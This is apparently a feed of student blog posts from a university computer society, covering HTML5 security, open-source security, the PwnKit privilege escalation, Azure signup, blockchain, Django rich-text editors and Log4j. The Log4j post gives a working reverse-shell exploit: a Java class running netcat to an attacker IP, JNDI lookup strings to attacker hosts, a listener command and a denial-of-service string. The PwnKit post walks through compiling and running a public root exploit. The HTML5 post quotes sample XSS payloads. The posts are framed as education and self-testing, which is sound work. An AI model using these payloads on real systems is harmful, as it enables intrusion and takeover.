Forem: IEEE Computer Society, VIT Chennai

Security Vulnerabilities and Prevention in HTML5

Mainak Chattopadhyay — Sun, 01 Jan 2023 07:40:43 +0000

The very basics of web development is HTML which provides a lot of functionalities to markup our webpages.

HTML5 has introduced some new features which make web pages richer. New features include new semantic elements like 'header', 'footer', etc., new attributes for form elements like date, time, range, etc., new graphic elements like SVG and canvas, and new multimedia elements like audio and video.

Hence , with increased functionality , the data flow has also increased leading to a possible data theft by attackers.

For example - An attacker can steal the data by inserting some wicked code through HTML forms which will be kept in the database. Security flaws are possible if proper security measures are not taken when using HTML5 features like communication APIs, storage APIs, geolocation, sandboxed frames, offline applications, etc.

Let us explore HTML Security

As HTML applications are web-based applications, developers should take proper measures to safeguard the stored data and communications

The following is the list of a few vulnerabilities that are possible in HTML-->

HTML Injection
Clickjacking
HTML5 attributes and events vulnerabilities
Web Storage Vulnerability
Reverse Tabnabbing

HTML Injection

As the name suggest , the attacker injects a malicious piece of code for channeling the data.

There are two types of HTML Injection -

Stored HTML Injection

The malicious code injected by an attacker will get stored in the backend and will get executed whenever a user makes a call to that functionality.

Reflected HTML Injection

The malicious code will not get code stored in the webserver rather will be executed every time the user responds to the malicious code.

Best Practices to prevent HTML injection -

Use safe Javascript methods like innerText in place of innerHTML
Code Sanitization: Removing illegal characters from input and output refers to HTML code sanitization.
Output Encoding: Converting untrusted data into a safe form where data will be rendered to the user instead of getting executed. It converts special characters in input and output to entities form so that they cannot be executed. For example, < will be converted to "&lt" ; etc.,

Clickjacking

It is an attack where an attacker uses low iframes with low opaqueness or transparent layers to trick users into clicking on something somewhat diverse from what they actually see on the page.

Thus an attacker is hijacking clicks which will execute some malicious code and hence the name 'Clickjacking'.
It is also known as UI redressing or iframe overlay.

For example,
on a social networking website, a clickjacking attack leads to an unauthorized user spamming the entire network of your friends by sending some false messages.

There are two ways to prevent Clickjacking -->

Client-side methods: The most common method is to prevent the webpages from being displayed within a frame which is known as frame-buster or frame-killer.
Though this method is effective in a few cases it is not considered a best practice as it can be easily bypassed.
Server-side methods: Security experts recommend server-side methods to be the most effective methods to defend against clickjacking. Below are the two response headers to deal with this.

Using X-Frame-Options response header.
Using Content Security Policy(CSP) response header.

Note - We would talk about response headers in details in later blogs.

HTML5 Attributes & Events Vulnerabilities

HTML5 has few tags, attributes, and events that are prone to different attacks as they can execute Javascript code. These will be vulnerable to XSS(Cross - site scripting) and CSRF(Cross-Site Request Forgery) attacks.

Examples-

1.Malicious script injection via formaction attribute



<form id="form1" />
<button form="form1" formaction="javascript:alert(1)">Submit</button>

In the above code snippet, the malicious script can be injected in formaction attribute. To prevent this, users should not be allowed to submit forms with form and formaction attributes or transform them into non-working attributes.

2.Malicious script injection via an onfocus event



<input type="text" autofocus onfocus="alert('hacked')"/>

This will automatically get focus and then executes the script injected. To prevent this, markup elements should not contain autofocus attributes.

3.Malicious script injection via an onerror event in the video-tag



<video src="/apis/authContent/content-store/Infosys/Infosys_Ltd/Public/lex_auth_012782317766025216289/web-hosted/assets/temp.mp3" onerror="alert('hacked')"></video>

This code will run the script injected if the given source file is not available. So, we should not use event handlers in audio and video tags as these are prone to attacks.

Lets us take a look into

HTML Sanitization

HTML Sanitization provides protection from a few vulnerabilities like XSS(Cross-site scripting) by replacing HTML tags with safe tags or HTML entities.

The tags such as ,,,,, which are used for changing fonts are often allowed. The sanitization process removes advanced tags like <script> <embed>,<object> and <link>.

This process also removes potentially dangerous attributes like 'onclick' attribute in order to prevent malicious code injection into the application.

Entity names for some HTML characters

When a web browser finds these entities, they will not be executed. But instead, they will be converted back to HTML tags and printed.

Example -

Consider the scenario that an attacker injects the below HTML code into a web page.



<a href="#" onmouseover="alert('hacked')">Avengers</a>

On using HTML sanitization, the response will be as below.



&lt;a href="#" onmouseover="alert('hacked')"&gt; Avengers &lt;/a&gt;

This code will not be executed instead of stored as plain text in the response.

There are many sanitizer libraries available to do this job. Some of the commonly used libraries are DOMPurify, XSS, and XSS-filters.

Local Storage Vulnerabilities

In our web applications, we often store some data in the browser cache. As the data is stored at the client-side, there is a chance of data-stealing by injecting some malicious code, if no proper care is taken. Let us now see how to store the data properly to prevent such attacks.

HTML5 has introduced Web storage or offline storage which deals with storing data in a local cache. Data can be stored using two types of objects in HTML5. Local storage and Session storage. These storages hold data in the form of key-value pairs.

Local storage holds the data in the browser cache until the user deletes it or it expires based on the expiry date given. setItem() method is used to assign data to local storage.

The below code creates three items with names bgcolor, textcolor, fontsize and assigns the values to them.



localStorage.setItem("bgcolor", document.getElementById("bgcolor").value);
localStorage.setItem("textcolor", document.getElementById("textcolor").value);
localStorage.setItem("fontsize", document.getElementById("fontsize").value);

Users can view the storage data in the browser by pressing F12 as shown below:

Similarly, session storage holds the data until the session ends or the browser/tab is closed.

An attacker can inject some malicious code and can steal the data stored here. So we should always ensure that sensitive information is not stored at the client side.

Preventive measure -

Use cookies with the 'httponly' flag to protect the data stored at the client-side

Let us get an overview of another type of possible attack

Reverse Tabnabbing

We would try to understand this with the help an example -

Consider a message forum or a blog where an attacker can post his own website link. If any user visits that link will be shown some information but in the background that malicious website will redirect the parent login page to a fake page that looks similar to the original login page.

When a user comes back to the message forum, they appear to be logged out. Without thinking they will enter their credentials to log in as the page looks similar to the original one. Now the attacker can get hold of that authentication data. Now the user will be redirected to the message forum page automatically so that they won't get a doubt that they have entered credentials in a fake login page

The impact of security in FOSS projects and the future

Abhijith Ganesh — Sat, 29 Jan 2022 14:40:30 +0000

All of us have either heard of the Faker.js debacle or have used the package in your repositories/projects. Faker JS has been very useful and convenient that one of the Amazon SDKs used them in some level. Unfortunately, due to the rogue actions of the maintainer(who actually had control over their repository and were legally entitled to do so) the package got impacted. This incident has become a turning point in the history of FOSS and security

Stop forking Open-Source software disgracefully

It is of high importance that we address the concern of Big Tech companies using FOSS software without any contribution. Maintainers are really tired of maintaining large repositories when there are big tech companies who swoop in and take the projects for free. Elastic (the company behind the infamous Elastic Logstash and Kibana stack) had recently amended their license to prevent one of the major cloud provider(s) from using their open-source projects and it clearly reflects on the mentality of the maintainers who are tired of seeing this happen. It is clear that the Open source repository maintainers are expecting major tech companies to back them instead of forking without any contribution.

The mentality of maintainers have evolved into :

Contribute to FOSS in any and all possible forms, Forking without contribution is disgraceful

Open Source is not equal to Secure

The idea of open-source applications being s3cure because of it being transparent has been disproved by this debacle and it can clearly be understood that, more time, attention, effort and money needs to go towards the security of Open Source applications. GitHub (which pioneers Open Source work) has rolled out useful features like dependabot but let us address the reality, is dependabot enough to maintain repositories? Certainly not. All of us can agree that dependabot is amazing for small repositories but for the scales of applications like Firefox, VLC Media player or even Kubernetes, it is certainly not enough.

This part of the story has a better ending than the previous part, Various tech giants have come together and committed 10 Million US dollars to fund the OpenSSF organization which works and strives to ensure the security of Open source projects. As developers, I think we should also start contributing to the projects and initiatives of OpenSSF to have a more harmonious tech-world.

Post-Script: What the maintainer of faker.js did was totally unacceptable and unfair though they were legally entitled to do so. It must be duly noted that they are not the only part of the community but their actions reflect the mindset of the community which runs the world. With that being said, there are FOSS projects which bring bread and butter to plates of the contributors and maintainers, it'd be really unfair for me(as the author) to not mention that perspective as well. Open Source community works on good-faith and acts of bad faith is detrimental to every stake holder of the community, including but not limited to itself.

PwnKit: PrivESC flaw in Linux

Shivansh Sharma — Thu, 27 Jan 2022 18:02:53 +0000

Security researchers had recently found a vulnerability in pkexec(allows an authorized user to execute PROGRAM as another user) that allows an authenticated user to perform a privilege escalation attack.

What is Privilege Escalation?

Privilege escalation is the exploitation of a programming error in an operating system or application to gain privileged access to the system. In simple words, we exploit a vulnerability to gain access to other privileged accounts.
For example, let's say you are using your school/Universities system and there are some folders that you are unable to access as they are asking for administrative accounts password or root accounts password this shows us that we are not having access to those folders as we are signed in as student user. Now to see content in the folder we have to escalate our privilege and become administrative/root user. As we don't know the password of the administrative/root account we will look for a vulnerability that will help us escalate our privileges, this escalation of privilege is called privilege escalation.

Vulnerability in pkexec(CVE-2021-4034)

pkexec is a part of a Linux component known as Policy Kit or Polkit that provides an authorization API through which unprivileged programs can access features offered by privileged programs or services. The pkexec utility itself also allows users to execute commands as another user and if no user is specified, it will execute the commands as root, the highest privileged account on Linux and UNIX systems.
The Qualys Research Team has discovered a memory corruption vulnerability in polkit’s pkexec, a SUID-root program that is installed by default on every major Linux distribution. This easily exploited vulnerability allows any unprivileged user to gain full root privileges on a vulnerable host by exploiting this vulnerability in its default configuration.
To get more technical insight on Vulnerability please refer to the Security researcher's Summaryhttps://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt. Also, you can check this link out https://gitlab.freedesktop.org/polkit/polkit/-/commit/a2bf5c9c83b6ae46cbd5c779d3055bff81ded683.

Linux distros Affected

As pkexec is installed by default on all major Linux distributions hence many of the popular Linux distributions are affected by this vulnerability. Researchers were successful in exploiting this vulnerability in Ubuntu, Debian, Fedora, and CentOS, they expect that many other Linux distros are also exploitable.

Check your system for Vulnerability

This Vulnerability is a major threat for public computers which has multiple accounts and are used by multiple people.
we will run an exploit for this vulnerability and if the exploit works then, this means your system is vulnerable to this vulnerability.
Follow these Steps

We will download the exploit from GitHub using the below-mentioned command.

git clone https://github.com/berdav/CVE-2021-4034
Then we will get inside the directory by cd CVE-2021-4034
After this type make command in terminal
Now everything is set just type ./cve-2021-4034
now type the whoami command you should get root in return.

Researchers say that this vulnerability was there since the first version of pkexec i.e. this vulnerability was present for a decade.

Patch for Vulnerability

All the Linux distros are in the process of releasing patches for this vulnerability or have documented alternative temporary mitigations.
If patches for your distro are not released then you can remove the SUID-bit from pkexec as temporary mitigation using this command.

chmod 0755 /usr/bin/pkexec

we can use the above-given command as an alternative until we get the vulnerability patched by our distros.
Note: if you use the above-given command you might not be able to use the pkexec command as a non-root user.

Activate your Free Azure account with these quick tips

Mayank Gupta — Tue, 11 Jan 2022 18:31:57 +0000

How to activate Microsoft azure account?

If you are the one who is facing issues in activating azure portal account or you are doing it for the first time, then you are at the right place. I will guide you through the entire process with some amazing tips.

Things that you need to have handy before starting the process are-

Digital device (laptop or phone)
Internet connection
Outlook mail ID
Credit card of Visa or MasterCard

So let's get started!

Tip:This is just a suggestion that one should switch to web browsers other than "Google" as it will make your browsing experience smoother with less advertisements disturbing you when you are concentrating, and will make your streaming faster.
I prefer using "Brave".

To get started, search "Azure Portal" in your preferred browser or click the following link-
https://azure.microsoft.com/en-us/features/azure-portal/

Click on "New to Azure? Start free"

Now, one has to provide a valid email. Make sure you have access to the email you are giving as the verification code will be sent there.

Tip: I prefer creating a new outlook account for azure and cloud related stuff.

Now, after getting your mail verified, you will have to provide your card details along with the residential address.

So here's something very important- only credit cards and that too, credit cards of Visa and MasterCard are accepted in India.
One can try using a debit card. For some of my friends it worked but not for me.

American Express credit cards are not currently supported as a payment instrument in India.

Tip: Contacting the Microsoft support team in case your card isn't getting accepted won't help you much. I did the same but after a long mail trail and calls, I finally had to borrow the card from my friend. So if you also don't have a credit card of MasterCard or Visa then you can try borrowing it from friends as I did.

Now it's almost done. Check the terms and conditions and press the next button.

It will take a few seconds to re-direct you to your azure portal account..

and it's done!

Now, an azure portal display will appear with your registered email Id at the top right corner and you'll see that you have been credited 200$ in your account for your first month. Now you can start exploring your azure portal.

After 1 month this azure free trial subscription will get expired and then you can shift to "Pay as You Go" subscription.
It won't charge much, just max 100 to 150 per month, if you'll use it wisely.
How we can use it will be covered in further blogs. Till then enjoy your free subscription and explore as much as you can!

This is all for today's blog. Now you can try out creating your azure account.
Incase you still face any error you can try asking me in the comments section.

Thank you for you time & ALL THE BEST!

Demystifying Blockchain Technology

Narayan Subramanian — Sun, 09 Jan 2022 17:02:16 +0000

Overview:
To thrive in this rapidly changing & globally competitive environment, businesses have no option but to be agile, resilient & innovative. This calls for digitalization of the processes which has been accelerated by COVID-19 & Industry 4.0.

The key challenge to digitalization is Data Security & Transparency. To address these challenges Blockchain has emerged as a possible antidote to one of today’s most vexing online business challenges — how to create greater trust, transparency and accountability for all who wish to transact and interact online.

Key Takeaways

Understanding Blockchain Technology
Why use Blockchain?
How does it work?
What are the opportunities?
When to use Blockchain?

Origin and History of Blockchain

In 2008, Satoshi Nakamoto (An Anonymous person/persons), first generated and implemented the first blockchain database as a infrastructure for the bitcoin, the first cryptocurrency ever created.

Satoshi Nakamoto used ‘block’ and ‘chain’ separately in his paper in October 2008
Later with time, it became a single word ‘blockchain’
From 2014 onward ‘blockchain 2.0’ is the term being referred to new applications of blockchain.

Role of Blockchain

Industry 4.0, the cause of the fusion of physical and the virtual world has come much forward around the type of technology which have come up around advanced robotics, 3D printing, IOT, Artificial intelligence, big data etc.

They are the key technologies around, but the problem we have now when we talk of technology which most of us are using like robotics or data analytics, they have improved the convenience speed and efficiency certainly. But the key thing which we are suffering in the technology is the time of transit from between the transaction and settlement, we have all the best technologies around now-a-days but the time cycle is very long it's more of a linear path then there's a duplication of efforts. For example, If you have 40 or 50 players involved in the whole supply chain each one is maintaining his own ledger then which one is the truth nobody knows it and if information is all centralized and the centralized data can be changed around so the trust is gone anybody can hack into the centralized system that's the way they lack the trust and the data security.

We are moving toward digital era but people are having worrisome the more we become digital anybody can hack our data so the concept of blockchain basically avoid those issues around, this is how the blockchain come if you look in this the technology enablers which have come from industry 4.0 like IOT, robotic process, 3d printing, augmented reality, cloud, AI, cyber security of which we all are aware, but the cyber security is not serving the purpose around in many places so the blockchain which is overriding you can see it's a new way of securing a trust transferring the values and storing the data the new way means it is not centralized information. Today when I am having 50 or 60 people in the whole supply chain and every information if it is particularly dealing with funds is going to the bank if anything else is going to some other servers and those servers are centralized so anybody can hack and change it but the moment the blockchain concepts come it's a more of a distributed concept so it's not a centralized a decentralized database and the moment it is decentralized it's not easy to change so that's how the blockchain is coming into our industry.

What is Blockchain ?

In the simplest terms, Blockchain can be described as a data structure that holds transactional records and while ensuring security, transparency, and decentralization. You can also think of it as a chain or records stored in the forms of blocks which are controlled by no single authority. A blockchain is a distributed ledger that is completely open to any and everyone on the network. Once an information is stored on a blockchain, it is extremely difficult to change or alter it.

What does it mean to be decentralized?
Traditional ledgers are centralized - use 3rd parties and middlemen to approve/record transactions Blockchain distributes ledgers across network or participating node – no central authority required similar to peer-to-peer torrent file sharing.

How does it work?

At its core, blockchain brings together an ecosystem of partners who all choose to collaborate to address inefficiency. There are 4 tenants of the technology that everyone needs to understand:

Shared, Immutable Visibility
Privacy: Blockchain Technology leverages years of research and development in cryptography.
Smart Contracts: Blockchain smart contracts are not legal documents so don’t think of it that way.
Trust/Consensus: Here again, Blockchain leverages cryptography. When an event is published to the ledger, the algorithms do a couple of things. First, the identity of the participant publishing the transaction is validated by other participants.

Blockchain owes its name to the way it stores transaction data – in blocks that are linked together to form a chain. Each block contains a hash (a digital fingerprint or unique identifier), timestamped batches of recent valid transactions, and the hash of the previous block.

In a nutshell, here’s how blockchain allows transactions to take place:

A blockchain network makes use of public and private keys so as to make a digital signature ensuring security and consent.
Once the authentication is ensured through these keys, the necessity for authorization arises.
Blockchain allows participants of the network to perform mathematical verification and reach a consensus to agree on any particular value.
While making a transfer, the sender uses their private key and announces the transaction information over the network. A block is made containing information like digital signature, timestamp, and therefore the receiver’s public key.
This block of data is broadcasted through the network and therefore the validation process starts.
Miners all over the network start solving the mathematical puzzle related to the transaction in order to process it. Solving this puzzle requires the miners to take a position their computing power.
Upon solving the puzzle first, the miner receives rewards within the sort of bitcoins. Such quite problems is mentioned as proof-of-work mathematical problems.
Once the bulk of nodes within the network come to a consensus and comply with a standard solution, the block is time stamped and added to the prevailing blockchain. This block can contain anything from money to data to messages.
After the new block is added to the chain, the prevailing copies of blockchain are updated for all the nodes on the network.

Consensus Mechanism

Proof Of Work
Proof of work (PoW) describes a system that requires a not-insignificant but feasible amount of effort in order to deter frivolous or malicious uses of computing power, such as sending spam emails or launching denial of service attacks. The concept was subsequently adapted to securing digital money by Hal Finney in 2004 through the idea of "reusable proof of work" using the SHA-256 hashing algorithm.

Proof Of Stake
Proof-of-stake (PoS) reduces the amount of computational work needed to verify blocks and transactions that keep the blockchain, and thus a cryptocurrency, secure. Proof-of-stake changes the way blocks are verified using the machines of coin owners. The owners offer their coins as collateral for the chance to validate blocks. Coin owners with staked coins become "validators."

What makes blockchain so lucrative to business?

First of all, it reduces operational costs. The removal of intermediaries may be a boon for business because it not only reduces cost but also reduces the purpose of contact — improving efficiency and growth.

Transactions speeds also are improved to a replacement height. For businesses, it's all about efficiency if they will keep their accuracy intact. The use-cases also are in favor of business. Some companies have already shown their interest in blockchain. The Dubai Blockchain Strategy is one example, The Dubai Blockchain Strategy will help Dubai to be the first city fully powered by Blockchain and make Dubai the happiest city on earth. The strategy will be using three strategic pillars: government efficiency, industry creation, and international leadership.

How Will Blockchain Disrupt Industries?

Several industries like Unilever, Walmart, Visa, etc. use blockchain technology and have gained benefits in transparency, security, and traceability. Considering the benefits blockchain offers, it will revolutionize and redefine many sectors.
Here are the top 5 prominent industries that will be disrupted by blockchain technology in the near future:

Banking
Cyber Security
Supply Chain Management
Healthcare
Government

Conclusion

This leads us to the end of our article “Demystifying Blockchain Technology”.

Blockchain is undoubtedly important to our society. It’s an impact on the current industries. It is unparalleled. With the growth of BaaS and other improvements, it is the only time when most of the industry will start adopting blockchain.

So, what do you think about blockchain? Do you see the benefits?

Integrating Rich Text Editor with Django

Onkar Apte — Fri, 07 Jan 2022 09:37:09 +0000

Creating blogs or article-based tutorials is one of the main aims of every web developer after successful deployment of a website. While it is not easy to create a text editor from scratch using JavaScript, it is certainly possible to make use of well-developed open source text editors. So, in this blog we will be integrating "ck editor" with Django.

Before we move on, I am assuming that all of the following pre-requisites are satisfied:

A thorough understanding of model forms in Django
Form rendering in template
Data models
Python and Django already installed in system

Alright! So, with the basics covered, let us quickly learn how to integrate "ck editor" with Django. For the sake of simplicity, I have presented the steps with lucrative code examples.
Step 1
In order to use the features of "ck editor", we first must need to install it. The installation is simple: Just execute the below command in the terminal of your Operating System.

pip install django-ckeditor

In a span of 2-3 minutes, the "ck-editor" would be installed. If it does not, don't worry! Try once again.

Step 2
It's time to create a new Django project or to open an existing Django project. Once, you are inside the project look for the setting.py file inside the project folder. Inside the file, again, look for a list named "INSTALLED_APPS". Just like adding a new app in the list, add "ckeditor" to the list.

Step 3
Now navigate to the views.py file inside the app folder where you wish to include "ck-editor". Inside the views.py file, create a model form linked to one of the models in the models.py file. For instance, I have created a model form named "ArticleForm".

Step 4
In the same views.py file, inside one of the views where you wish to display the "ck editor", use the model form which you created in the previous step and pass the form to the template through a variable using the render method.

Using the form() method, I have created a new ArticleForm and then assigned it to a variable simply named "form". At last, I have passed the form to the template create.html as myForm.

Step 5
Now, we have to decide which field of the form has to be given the "ck editor" features. To do this, open the models.py file inside the app folder in which you wish to add the "ck editor" features. Locate the model and hence, the required field. To this field, assign the RichTextField() attribute. Make sure to import RichTextField().

from ckeditor.fields import RichTextField
class Article(models.Model):
    title = models.CharField(max_length=300)
    user = models.ForeignKey(User, on_delete=models.CASCADE, related_name="creator")
    datePosted = models.CharField(max_length=20, default="")
    timePosted = models.CharField(max_length=20, default="")
    category = models.CharField(max_length=300)
    content = RichTextField(null=True, blank=True, 
    config_name="special", external_plugin_resources=[(
    'youtube', '/static/shareledge/ckeditor-plugins/youtube/youtube/', 'plugin.js',
    )])

In my case, I have used the field content. At this point of time, the use of RichTextField(null=True, blank=True) would suffice.

Step 6
This is the final step. Head over to the template where the form has to be rendered. We know that any form can be rendered in the template using

Since, in my case the form is passed as myForm, I will just render it using

{{ myForm }}

. In order to add "ck editor" to the template, I will just have to add

{{ myForm.media }}

to the code.

Of course, I will have to customize each field of the form according to my styling preferences. Part of this is shown below.

That's it! We are done. If we open the webpage, we would be able to see the field rendered as "ck editor".

This field now inherits tons of features such as Bold, Italic, Line spacing, Image insertion, Font colour and much more.

Additionally, if we look at the admin interface the same field will use the "ck editor" features there itself too.

So, that's it about this blog. I hope you find the information in this blog useful. Feel free to comment below anything related to the content.

Understanding and Exploiting Log4J Vulnerability

Shivansh Sharma — Sat, 25 Dec 2021 19:23:11 +0000

If you are here then you might have already heard of log4j vulnerability. It is the current trending topic in IT domain as this vulnerability made millions of sites vulnerable to RCE(Remote Code Execution). Lets try to understand what is Log4j and what vulnerability is exploited to gain RCE.

What is Log4J ?

Log4J is a Java-based open source component maintained by the Apache Foundation that is commonly incorporated into Java applications. It allows to record traceability of operations at a functional and operational level in a multitude of services, even from a security point of view. So basically it is a library used for logging(maintaining a record of events occurred in a application) in applications.
this image shows how a log file look like.

What is the Vulnerability in Log4j?

Developers were expecting the Log4j library to record application/server values, including input strings, with the expectation that those strings were plaintext and not able to invoke APIs but in log4j if we gave input parameter like {jndi[:]ldap[:]//.... we were able to invoke JNDI API. JNDI is the Java Naming and Directory Interface , It is a library/service allowing for runtime configuration. So, this JNDI API leads in leakage of sensitive information and thereby facilitate other attacks which finally results in getting a Reverse Shell.

Who are Affected by Log4J?

Log4J can be found in variety of places. Its was widely used for logging in programmes, Application, Games, Application Development tool and hence hackers have a wide range of targets to attack.

Average time to repair a software is 1-4 Weeks . As Log4J was widely used repairing it would takes years and hence this vulnerability is estimated to be exploited for years.

From Open Source to Commercial Solutions all are affected by by this Vulnerability. Studies carried out by Google indicate that 8% of the packages in the central Maven repository have been affected by this vulnerability. you can check out this link for more info. https://security.googleblog.com/2021/12/understanding-impact-of-apache-log4j.html

Affected Companies(List Keeps on increasing)

Apple, Intel, Amazon, Oracle, VMWare, IBM, Cisco, Redhat, Atlassian, BMC, Fortinet, F5, McAfee, Twitter, Baidu, Tesla, Palo Alto, SonicWALL, SolarWinds

Many opensource solution are also affected here is the list of applications who used java in their infrastructure like Apache Struts, Apache Struts2,Apache Tomcat, Apache Spark, Apache Solr, Apache Kafka, ElasticSearch, flume, Log stash, IBM Qradar SIEM, NetApp, Pulse Secure, etc.

Checkout this link for knowing Log4j impact on manufacturers
https://github.com/YfryTchsGD/Log4jAttackSurface

What are Hackers Doing by Exploiting this Vulnerability

Hackers are running ransomware campaign, Deploying botnets and Mine XMR coins on Compromised Systems. None the less if they get access to data they will steal it.

Why Companies are not able to patch Log4J Completely?

Most of the companies have patched their code base for Log4j but the problem that most of them are facing is that all the vendors of company need to patch log4j package in their product which is out of their control and they cannot do anything in that.

Checking if the site is Vulnerable to log4j RCE

To check if the site is vulnerable to Log4J RCE first find areas where we can input strings (like search box, etc.).Then Visit https://log4shell.huntress.com/
and copy this text ${jndi:ldap://log4shell.huntress.com:1389/<Your unique identifier>} then paste it in the input area now go back to the page from where you copied and you will see a result keyword hyperlinked click on it and see if there is a entry of your site, if the entry is there then your site is vulnerable to log4j RCE.Now lets understand what is log4shell.huntress.com doing and how is it checking our site for vulnerability. For this we have to understand how our input is working

{jndi:.... ------> this invokes JNDI API and access external resources
:idap:.... -----> this shows that target will reach out to an attacker controlled location over idap protocol
://log4shell.huntress.com:1389/-----> This is the address of attackers controlled host basically we are reaching out to this site.

All these parts makes us understand that we are establishing a connection between site and a attacker controlled host.

Alternately you can use cisagov/log4j-scanner to scan for log4j Vulnerability on your site.

Fixing The Vulnerability

To fix this Vulnerability you should update your java and log4j to latest Version(i.e. Log4J V2.17 or above) this doesn't guarantee that Vulnerability is fully patched but reduces some what risk. Also check out snyk remediation cheat sheet https://snyk.io/blog/log4shell-remediation-cheat-sheet/

Vulnerabilities Published on Log4J

CVE-2021-44228 Version Affected: Apache Log4j2 2.0-beta9 a 2.12.1 y 2.13.0 a 2.15.0
CVE-2021-45046 Version Affected: 2.0.1 – 2.12.2 (excluded) y 2.13.0 – 2.16.0 (excluded)
CVE-2021-45105 Version Affected:Log4j2 versions 2.0-alpha1 hasta 2.16.0 (included).

Exploiting Vulnerability (ONLY FOR CVE-2021-44228 and CVE-2021-45046)

for Exploiting this vulnerability we will be writing an payload and then we will be compiling it and then we will trigger it to get reverse shell.

Follow Steps:

NOTE: Here we are considering that our targeted server's OS is linux and netcat is already installed in it.

public class Exploit {
    static {
        try {
            java.lang.Runtime.getRuntime().exec("nc -e /bin/bash <YOUR.ATTACKER.IP.ADDRESS> <Listening port>");
        } catch (Exception e) {
            e.printStackTrace();
        }
    }
}

Write exploit in Exploit.java file using above given code
Compile the java filejavac Exploit.java -source 8 -target 8
Host a temporary HTTP server for exploit
set a net cat listener to listen to exploit.nc -lnvp <Attacker port number>
for CVE-2021-44228 put{jndi:ldap://YOUR.ATTACKER.IP.ADDRESS:ATTACKER PORT/Exploit\}as input
for CVE-2021-45046 put {jndi:ldap://127.0.0.1#attacker.com/exploit} as input 1.you got a reverse shell.

For CVE-2021-45105 we cannot get a reverse shell but we can use ${${::-${::-$${::-j}}}} this parameter to to generate a StackOverflow exception that may lead to the termination of the vulnerable application process, giving rise to a denial of service (DoS) vulnerability.

Use this link to get technical insight on the Vulnerability
https://businessinsights.bitdefender.com/technical-advisory-zero-day-critical-vulnerability-in-log4j2-exploited-in-the-wild